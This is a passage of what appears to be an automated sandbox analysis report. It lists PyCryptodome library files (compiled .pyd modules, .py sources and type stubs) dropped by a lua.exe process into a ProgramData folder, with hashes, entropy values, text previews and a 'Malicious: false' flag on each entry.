SHA-512:	D1EA9F01EA1A16B23B6219492B3D2A27B017EA8D5511549C82FE3A58DA988B890E52D144630C55FD845B8D079C4B6D3FD2172020CECC5F6DD6A05B1495D18C71
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......F.f.......................................$....................................................Rich....................PE..d...m.!`.........." ...............T.....................................................`.........................................PH......(I..d....p.......`..X...............$....A...............................A..8............@...............................text....)......................... ..`.rdata..x....@......................@..@.data........P.......<..............@....pdata..X....`.......>..............@..@.rsrc........p.......B..............@..@.reloc..$............D..............@..B................................................................................................................................................................................................................................................

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Hash\_SHA224.pyd Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	21504
Entropy (8bit):	5.882674376485668
Encrypted:	false
SSDEEP:	384:vRlEGHXgKXqHGcvYHp5RYcARQOj4MSTjqgPmEOsvUk:XdHXgP/Ytswvdek
MD5:	AAECC8D543E782F3088DDF3A8B6BE854
SHA1:	A05FF079725B28A346009A6D2AF96628D0AE5FE0
SHA-256:	D6AB77B3FC17524E77434B6D9D22DEEB0A2980004F251BB9ED5AF2DDC8910F91
SHA-512:	C2F9B85EC21257E6AF21708140380F0F12C23AFC471AABD67613CC716E5B6967E964AE815D65FC5931BE83C75D86FB3B52F7FB4F93F0544B06B05DDDBE7AD478
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......F.f.......................................$....................................................Rich....................PE..d...o.!`.........." .....6... ......T.....................................................`..........................................Z.......Z..d............p..................$....R...............................R..8............P...............................text....5.......6.................. ..`.rdata..8....P.......:..............@..@.data...(....`.......J..............@....pdata.......p.......L..............@..@.rsrc................P..............@..@.reloc..$............R..............@..B................................................................................................................................................................................................................................................

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Hash\_SHA256.pyd Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	21504
Entropy (8bit):	5.8852874125857255
Encrypted:	false
SSDEEP:	384:+RlEGHXiKXqHGcvYHp5RYcARQOj4MSTjqgPmE89Uk:QdHXiP/YtswvdLk
MD5:	363B8E9F9A119EE0A52D8E75083F3F5D
SHA1:	E0F4316F5AFD2ABC31047B50FDD7910D148A7611
SHA-256:	1B36AFC5B2F6F46D1A2457D56F276F5B5FFED066955ACEC911B9B7973D1E92B3
SHA-512:	3862436B88DAE084993772D6EBDD3C7A892A562045CE448BC6419C7C21C797C806EF6030157C8DAF2E85A36B13ED0CE4475EB00E61EE0CBEC4DB2677E780F177
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......F.f.......................................$....................................................Rich....................PE..d...n.!`.........." .....6... ......T.....................................................`..........................................Z.......Z..d............p..................$....R...............................R..8............P...............................text....5.......6.................. ..`.rdata..8....P.......:..............@..@.data...(....`.......J..............@....pdata.......p.......L..............@..@.rsrc................P..............@..@.reloc..$............R..............@..B................................................................................................................................................................................................................................................

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Hash\_SHA384.pyd Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	26624
Entropy (8bit):	5.843149655925948
Encrypted:	false
SSDEEP:	768:RHJh9k54Stui0gel9soFdkO66MlPGXmXcCktk:RH6Ju/FZ6nPxMFk
MD5:	CC4390EA93568D232C22680D2E51D605
SHA1:	5B8F5A3C6EB961EFAFA89A8E94CF2950380CA297
SHA-256:	F6171DDA2B244CA477FCFEBA269EDE4C3A6A019C7BEDA6CC543C6FFA76E297F1
SHA-512:	CD523086279D7E85171B40D68EEC07ACD055784817BB23660DBAE139639EDC16F228FAD8A600EB28BD358416C25FB0E203F5131616CC786EDCC7CE582CC4A96A
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......F.f.......................................$....................................................Rich....................PE..d...p.!`.........." .....H..."......T.....................................................`..........................................k......hl..d...............................$...pd...............................d..8............`...............................text....F.......H.................. ..`.rdata.......`.......L..............@..@.data...(............^..............@....pdata...............`..............@..@.rsrc................d..............@..@.reloc..$............f..............@..B................................................................................................................................................................................................................................................

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Hash\_SHA512.pyd Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	26624
Entropy (8bit):	5.897044578820529
Encrypted:	false
SSDEEP:	768:AxpB9/i4z5tui0gel9soFdkO66MlPGXmXcPtBJkS:Ax11u/FZ6nPxM9k
MD5:	64DD7510BCEA12F282B584C6F6D99595
SHA1:	AB2073237FDE1B51AC65EF0F6B2A6C14A99F1810
SHA-256:	0DB587B58C885C0B42C337F1883FC2E50998DC9DBCB556368A833957EFF9ED5F
SHA-512:	29EE95875EED4D077BAA2F942DFBDD917620D267592B7AB0C9267791C2DE9EAF2834AAC843EC88340C625ECD8F2E017D92FB63F0C780DC38ACF0A59FDBA993BE
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......F.f.......................................$....................................................Rich....................PE..d...q.!`.........." .....H..."......T.....................................................`..........................................l.......l..d...............................$....d...............................e..8............`...............................text...xG.......H.................. ..`.rdata..H....`.......L..............@..@.data...(............^..............@....pdata...............`..............@..@.rsrc................d..............@..@.reloc..$............f..............@..B................................................................................................................................................................................................................................................

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Hash\__init__.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1141
Entropy (8bit):	5.16253854892868
Encrypted:	false
SSDEEP:	24:lcAXDrFR/F2IPBiCXCpjf29QHupsUre38Ok41+dpo3oq/FyIj:KIB0jcQHMsvI/S3oCFXj
MD5:	9BCEF8B4D566C8F14BA13D91E39592DE
SHA1:	7BEAB34CD9F49AEA286AD3CF00C8884AF4D7284E
SHA-256:	8044488F8C54C0A9E8BB350EE87C13AF8C7F3C0BCCD953565222AE2511A5E135
SHA-512:	7F6D65B28D57E01725F1E55DF370C45605C1115C252DBDE00786765E7C5446CBDC244BDAD6DC3991224F568D77FFDE5FA1DAC3AD638C93BCFCCBBBE4B061BAFC
Malicious:	false
Preview:	# -- coding: utf-8 --..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ================================================================

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Hash\_ghash_clmul.pyd Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	12800
Entropy (8bit):	4.957148567482555
Encrypted:	false
SSDEEP:	192:6UBpDmr37utd9PHv2O3sER2fi3s4DLUgdLl:wDit6O3sa4gUO
MD5:	6FFDCBB8B3860FAB46A4666C97F17EAF
SHA1:	87DEFB8A639E0AF86B6943490EB5456D6D63183E
SHA-256:	2EA2B17AAAC9E572EEF1239B01E8AD378829B765958FD1BF306F39983A76F944
SHA-512:	769941E8AAC1075415F27C272510EDA7C6156A0F29F0A19523251367946340EF53315771E6985C91FF4314BA1FCB939B1D5CD197DCBDAAED272733C9875E9B5B
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............................@......................@.......@.......@.......f.......f.......f.......f.......Rich............................PE..d...s.!`.........." ................T.....................................................`..........................................8.......8..d....`.......P...............p..$....1...............................1..8............0...............................text............................... ..`.rdata.......0......................@..@.data...H....@.......(..............@....pdata.......P.......*..............@..@.rsrc........`......................@..@.reloc..$....p.......0..............@..B........................................................................................................................................................................................................................................

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Hash\_ghash_portable.pyd Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	13312
Entropy (8bit):	5.015141457457203
Encrypted:	false
SSDEEP:	192:QUBpDmr37utd9PVv27c0qKzLF4DmxXUcDLU/:KDitwzvV4DaEiU/
MD5:	35025BBDBEA7932BBE4E79627250DC46
SHA1:	4082C2ABA70D98FCF6EC2B82FF4CC6692D7B56AC
SHA-256:	800CC846930302519335AFDD276F9CBBE5F940FE1E5035CB6BAF4FB736D37434
SHA-512:	A65E3C17E2EF456258EEC06E81FCFA9AF97A0D13B05EACA96935E371AA5E768EBA9FA2E00F6CB5930D25D57380654CD2B8C8CB680A686C912E5F36A3046E0DB9
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......F................K........................&.......................................'............Rich....................PE..d...s.!`.........." ................T.....................................................`..........................................7.......8..d....`.......P..X............p..$....1...............................1..8............0...............................text............................... ..`.rdata.......0......................@..@.data...H....@.......*..............@....pdata..X....P.......,..............@..@.rsrc........`.......0..............@..@.reloc..$....p.......2..............@..B................................................................................................................................................................................................................................................

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Hash\_keccak.pyd Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	15360
Entropy (8bit):	5.2438990151876474
Encrypted:	false
SSDEEP:	192:eUN0iKNb3NuUPyxfFNhoCoK7e+TcBXJ2kMQ75iUnElDLUH:PYz8JpF39oK6+QBXJ2k775PKU
MD5:	22149EEC9377CFFD88728EBEBC484057
SHA1:	B743CF6DC15E3C1642D84686B05720AE5F2BCDC4
SHA-256:	DB926D9FAD6B42B69B8D1122F061F45562AD52C10380B3CBAAFA077E03BC0DEF
SHA-512:	81D67825EEC6D84D199F59AD8D3FFA3D829ED9C331DC491C785E1579325A0C9F2618908DCDE72BB76EE3D54757432CB923BE07FA7A4CCE454103B5CC276B0869
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......F.f.......................................$....................................................Rich....................PE..d...q.!`.........." ..... ..........T.....................................................`..........................................8.......9..d....`.......P..d............p..$...p2...............................2..8............0...............................text............ .................. ..`.rdata.......0.......$..............@..@.data........@.......2..............@....pdata..d....P.......4..............@..@.rsrc........`.......8..............@..@.reloc..$....p.......:..............@..B................................................................................................................................................................................................................................................

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Hash\_poly1305.pyd Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	14848
Entropy (8bit):	5.254366768987153
Encrypted:	false
SSDEEP:	192:k39lJPKBb3+ujPH/41fPnVSEsV3+ldpCAr18vOjpDLUFDdA:09wzdz/afPCV3Ydj2vMUFpA
MD5:	094C656C177D9CB07111D4ED3439B9FF
SHA1:	1EA5A3E6A9E23F6426C22AA95E81E3C7595FF72D
SHA-256:	A410F5A5A3566025FAA30278001EBB26C6E1EFF07FC17B092D96F0443190D526
SHA-512:	5E9509E94F40B22FFE49DA307316D99C0E7F0C9F79C14E28660362E42A52BB713CC3516C9812497C65240B2A3190912714BE34A54BF17B160CAFBE6CC39BD36D
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......F.f.......................................$....................................................Rich....................PE..d...s.!`.........." ................T.....................................................`..........................................8......h9..d....`.......P..\|............p..$....1...............................1..8............0...............................text............................... ..`.rdata.......0......."..............@..@.data........@.......0..............@....pdata..\|....P.......2..............@..@.rsrc........`.......6..............@..@.reloc..$....p.......8..............@..B................................................................................................................................................................................................................................................

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Hash\keccak.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7279
Entropy (8bit):	4.726887025578257
Encrypted:	false
SSDEEP:	96:M7DqrYJALrYJHdt3EHGuIWHgkIOqDYSs8JlOixIVmkO/Ym3RUaIDrFX2dlPcQ:4qrskrs9t3q/INDtOi7kO/vBiMUQ
MD5:	8D69B43D82C4A1112BB8FB37AD2E8F97
SHA1:	BE5AADC58B4F655EA521CE3DA424B19142F5492E
SHA-256:	A936C23B1564E3E08F7F615B34A15A1F213969C85E6287A03BBC54CB51950783
SHA-512:	0ADD028046EFB02D00FD024039AB06C317B90629D6A085D2EDE93945C2E86134F0F2678B44E8D96691DC9D8A5A111DBECEB5FD0D4BE43E70FE0755596ECCAE34
Malicious:	false
Preview:	# ===================================================================..#..# Copyright (c) 2015, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Hash\keccak.pyi Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	764
Entropy (8bit):	4.362163899247177
Encrypted:	false
SSDEEP:	12:1REYBhvIY3PHpRyD1Ap1uw+z65JX3LBq3v37lz04LBK3P3blzO:1REYT3v/IALWz6LLBkPhz04LBEvBzO
MD5:	0A2310BA7677F27E22A421132A86D382
SHA1:	A976C8749DEE4E295DD8C808E2A7A47922E86BB4
SHA-256:	3A1DB3E7321EFB30C4AAF0FAD5728728C7AADCEBBBE91E4272940DB1F9A677F9
SHA-512:	6526BCDFF7B41EB7E94F83A2E1A770D6216E4C575410E8689C7119F6A53170CAA5B2F8AED037EB5AB40C7CA361C2E7208BF3F19C69D8E619150A1C68779FE22C
Malicious:	false
Preview:	from typing import Union, Any....Buffer = Union[bytes, bytearray, memoryview]....class Keccak_Hash(object):.. digest_size: int.. def __init__(self,.. data: Buffer,.. digest_bytes: int,.. update_after_digest: bool) -> None: ..... def update(self, data: Buffer) -> Keccak_Hash: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def new(self,.. data: Buffer = ...,.. digest_bytes: int = ...,.. digest_bits: int = ...,.. update_after_digest: bool = ...) -> Keccak_Hash: .......def new(data: Buffer = ...,.. digest_bytes: int = ...,.. digest_bits: int = ...,.. update_after_digest: bool = ...) -> Keccak_Hash: .....

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Protocol\KDF.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	20403
Entropy (8bit):	4.828300547674679
Encrypted:	false
SSDEEP:	384:WeQNF6aoMwVVlrV4ENoDGQ/QNzRS1zyid3KKKXV+:9kIV4QoDG5zRCnKl+
MD5:	558D7427CDDA1443A0F04B07E29F0308
SHA1:	F7BC082E97B56CFA4CF48173470F726A965C9B92
SHA-256:	6D39CC552C6C0240F3A76EC3A41B6403AE50F9B36102BCEDB763A78F1B2BEA35
SHA-512:	17742F3965095CCEFB34B70EFABAC1C20B8F726C4D7DE65B75C28D63E1F8B299FB5C47F40FD8ED2EBE8A304CF41A9B0A93BD680C079C3D14B560E1DE523C93CB
Malicious:	false
Preview:	# coding=utf-8..#..# KDF.py : a collection of Key Derivation Functions..#..# Part of the Python Cryptography Toolkit..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DE

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Protocol\KDF.pyi Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1407
Entropy (8bit):	5.023782115909509
Encrypted:	false
SSDEEP:	24:1RM7CgiV+IcH9wNvfn2ucHM8wsSvfqAtSQKI0roIGcih14XLkjcHhKrLkNnnQAEv:cc8IA4B0Aq3myAjhANxt9zK
MD5:	F90347222F272FEE03536382DB0E55AE
SHA1:	30A8A0FE6F04A19828A8756EE5522865710ABDB7
SHA-256:	CB0A9EEC76345D2A224B032FB96FB530F20F4974C994F2D12DAA7BAC82F69DDB
SHA-512:	A457908E31D042781BB94D2E3CDE94C61222661CAF3161D5143D021082CAC7FCA02BE6365665A2D44DBD4217A3DFA63ED57931B07B28244A87C8C225CBF2AC6F
Malicious:	false
Preview:	from types import ModuleType..from typing import Optional, Callable, Tuple, Union, Dict, Any....RNG = Callable[[int], bytes]....def PBKDF1(password: str, salt: bytes, dkLen: int, count: Optional[int]=1000, hashAlgo: Optional[ModuleType]=None) -> bytes: .....def PBKDF2(password: str, salt: bytes, dkLen: Optional[int]=16, count: Optional[int]=1000, prf: Optional[RNG]=None, hmac_hash_module: Optional[ModuleType]=None) -> bytes: .......class _S2V(object):.. def __init__(self, key: bytes, ciphermod: ModuleType, cipher_params: Optional[Dict[Any, Any]]=None) -> None: ....... @staticmethod.. def new(key: bytes, ciphermod: ModuleType) -> None: ..... def update(self, item: bytes) -> None: ..... def derive(self) -> bytes: .......def HKDF(master: bytes, key_len: int, salt: bytes, hashmod: ModuleType, num_keys: Optional[int]=1, context: Optional[bytes]=None) -> Union[bytes, Tuple[bytes, ...]]: .......def scrypt(password: str, salt: str, key_len: int, N: int, r: int, p: int, num_keys:

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Protocol\SecretSharing.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	9056
Entropy (8bit):	4.7874787545071635
Encrypted:	false
SSDEEP:	192:oqrskrs9t3q/IG1RYr24zEqG5TFiW4m1DH/T:Xrskrs9VqPaQqSTFiWV7
MD5:	8F0F67CEDF28EC2C022DC31587D03BB5
SHA1:	86EC75E3ACBF09488E0592A026F40FF26A27BBF5
SHA-256:	4DB85B5FF214482B6A912C0E90E73F8164B54AC4CC69390DE67024A4B6FD164D
SHA-512:	B6EC5234AF9CC7C513D7FD95BD1638177B0778FA65E19813319B7951B3846F3F83BADC4CFD85FA465CB98886CA73F206228FA336F0F62FFA8E23E455A1BC5BE0
Malicious:	false
Preview:	#..# SecretSharing.py : distribute a secret amongst a group of participants..#..# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DI

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Protocol\SecretSharing.pyi Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	820
Entropy (8bit):	4.725635475246741
Encrypted:	false
SSDEEP:	24:1RElqMAWKVAATGujmo2Iu9DSjYlQTKUajh2FK4AghCN:XMom87jm5Uaj54zY
MD5:	2C29B85AA1A7948F90DCFD8358D8E6B4
SHA1:	A3915B73FF0D5551F611428FEDB436617E35B93F
SHA-256:	17BB4B071A5BAAB986780546A7B0F506F186A683CB2A2A9C9C3B727C3D9C0921
SHA-512:	665A60174EC4D827D95F11F2B88229E943EFF1C2C60F463DD710546970261FE8D8BBF2B527AA82ECB18F25BB1310ED11AFFE8997EC997DEA6D04D4A908EF96C4
Malicious:	false
Preview:	from typing import Union, List, Tuple, Optional....def _mult_gf2(f1: int, f2: int) -> int : .....def _div_gf2(a: int, b: int) -> int : .......class _Element(object):.. irr_poly: int.. def __init__(self, encoded_value: Union[int, bytes]) -> None: ..... def __eq__(self, other) -> bool: ..... def __int__(self) -> int: ..... def encode(self) -> bytes: ..... def __mul__(self, factor: int) -> _Element: ..... def __add__(self, term: _Element) -> _Element: ..... def inverse(self) -> _Element: ..... def __pow__(self, exponent) -> _Element: .......class Shamir(object):.. @staticmethod.. def split(k: int, n: int, secret: bytes, ssss: Optional[bool]) -> List[Tuple[int, bytes]]: ..... @staticmethod.. def combine(shares: List[Tuple[int, bytes]], ssss: Optional[bool]) -> bytes: .......

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Protocol\__init__.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1579
Entropy (8bit):	5.201093700172131
Encrypted:	false
SSDEEP:	48:MwWOqrYJALrYJHdG43tDs3EsIG13NcuIHs:MwDqrYJALrYJHdt3EHGuIM
MD5:	EB8179344608B85213CC70F97A338B99
SHA1:	63060697A45F92F79AE090D4C694DF42F0877460
SHA-256:	270642950532901553748FCD0A410F380465F0B0D2ADA065F3B98F87A0768327
SHA-512:	CFE340DA758CB09C838E68645CD721C76CD167FD90E0BACFD34CCC91858A04C79D5372A10DAF7CBE7A7A1D357EEA18EF2238A4D22CCCD63C32545FD97C21AF57
Malicious:	false
Preview:	# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Protocol\__init__.pyi Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	44
Entropy (8bit):	4.516027641266231
Encrypted:	false
SSDEEP:	3:UFo+Cu1KvCGQQN+Zen:U9uCGQY+Zen
MD5:	4200283AFF0E859DE9F1C15EBAD7A073
SHA1:	42B5DC005A804C92E877D93FB14FDB41E52C6C7A
SHA-256:	D17FF2840E82E8BDF3FC2378B27B824FE0C97506473295746C18253407FDA61B
SHA-512:	A4CC0C1A5F215A9E422DF2DF80086E39767ADB2D6D2DA0E086FED921D087847664CCD3D9F7170834E2DCE8B4C07F71422CA0BB962627D4A1CFAFF0E6621FD383
Malicious:	false
Preview:	__all__ = ['KDF.pyi', 'SecretSharing.pyi']..

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Protocol\_scrypt.pyd Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	4.725011651996944
Encrypted:	false
SSDEEP:	192:Y942/KIb3bu95Pp2abc64rVNn4DLUOVdB:sJzCxl464nGUOf
MD5:	DCD7E1C1F1E68405D66CEF954CBAEE38
SHA1:	BBE8C8BDE0E1956F4D88D737D50B2215073CDCB1
SHA-256:	0EC713F4F3E963F618873FF538C7DCC532E0FABA5025C5A8E20AC089FDFCF1D4
SHA-512:	10D2048FF68515862B95E658BB33E42ED0FD2AB70DB66F2738487D21739172D4F24FFB8F239FDFC6F479CE582A85C3B8F8ADFB5024DAD5769713A4B3D22D3115
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........./...A...A...A.......A.@.@...A...@...A...@..A.@.D...A.@.E...A.@.B...A.f.I...A.f.A...A.f....A.f.C...A.Rich..A.........................PE..d...y.!`.........." ................T.....................................................`.........................................P8..d....8..d....`.......P..4............p..$....1...............................1..8............0...............................text...X........................... ..`.rdata.......0......................@..@.data........@.......&..............@....pdata..4....P.......(..............@..@.rsrc........`.......,..............@..@.reloc..$....p......................@..B........................................................................................................................................................................................................................................

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Random\__init__.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1866
Entropy (8bit):	5.171387928684167
Encrypted:	false
SSDEEP:	48:hIB0jcQHMsvI/S3oCFadPyopEm7XRXTR5:SFQHvohqTm7XRXF5
MD5:	F6DAA1095142342733AB132C05D1DDFE
SHA1:	1EBAFA39A224F69887333A00E0AE1BD69178315E
SHA-256:	05E8D3E5D2B18C1731189DB337B04CB83E966DC385930836FA22E9EE0F376FB9
SHA-512:	246058D7F397CDCACE81B09FDEBA5B17C240264A70375D99B4FD0FFBFFC54208D312BC38894E74B531BD3F9CB40105FA9DD834C74250B73A0C8E8DB583FB0E41
Malicious:	false
Preview:	# -- coding: utf-8 --..#..# Random/__init__.py : PyCrypto random number generation..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ==

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Random\__init__.pyi Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	386
Entropy (8bit):	4.828244249619416
Encrypted:	false
SSDEEP:	6:1REYBFovLD2dC1ZSM+mHv0tAE7Ky3L5RSMtAMjMEFy7yA4TSJDZj5:1REYB8D2ACM+meh7KyVVpJy7yAGkDR5
MD5:	A4CDA07BACD9EDBD7C0243B029D79400
SHA1:	B068F43B0EAE31972C2B6C6335BBCA2497B948FB
SHA-256:	3A9548EF07A83C2F2BF7DB05EDB776BD788B9D9C112EA8155333242839CC27D7
SHA-512:	A1412BAF95D6910D821B927BE91CFD740F2DD8A98E259950E5FF06409CEC8E01EB6B06AC1747A8FF06098849142EBF2754AEED361FFCD37954FFFC13BCE1D3C0
Malicious:	false
Preview:	from typing import Any....__all__ = ['new', 'get_random_bytes']....from os import urandom....class _UrandomRNG(object):.... def read(self, n: int) -> bytes:..... def flush(self) -> None: ..... def reinit(self) -> None: ..... def close(self) -> None: .......def new(args: Any, *kwargs: Any) -> _UrandomRNG: .......def atfork() -> None: .......get_random_bytes = urandom....

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Random\random.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	5372
Entropy (8bit):	4.828979692628258
Encrypted:	false
SSDEEP:	96:o5wfFQHvoeTcHIpVaRhNkNNrvvGDwotbxcOV+gnNflG7b0/Yt5:o5wdQHv5rjIvsotlcU+g60/S
MD5:	3BD14C0DD7FE75741EE0742BDA794418
SHA1:	31B75C61FEA51D7E69247B3D47FC37DE5247C817
SHA-256:	01ADBD3F51A22F71EDD8B3FB3F45BB849C9D9A46E00A7CFD25C28EA780512E3C
SHA-512:	4FE054877C0749994FDE32CEA437C659FD2B406E3E057A2D9C27ADCFF6E556D8FEC48615B01AAD7B6502B40E5CF7C2CA342B626DB8D07F191E2D63FBD9E15E28
Malicious:	false
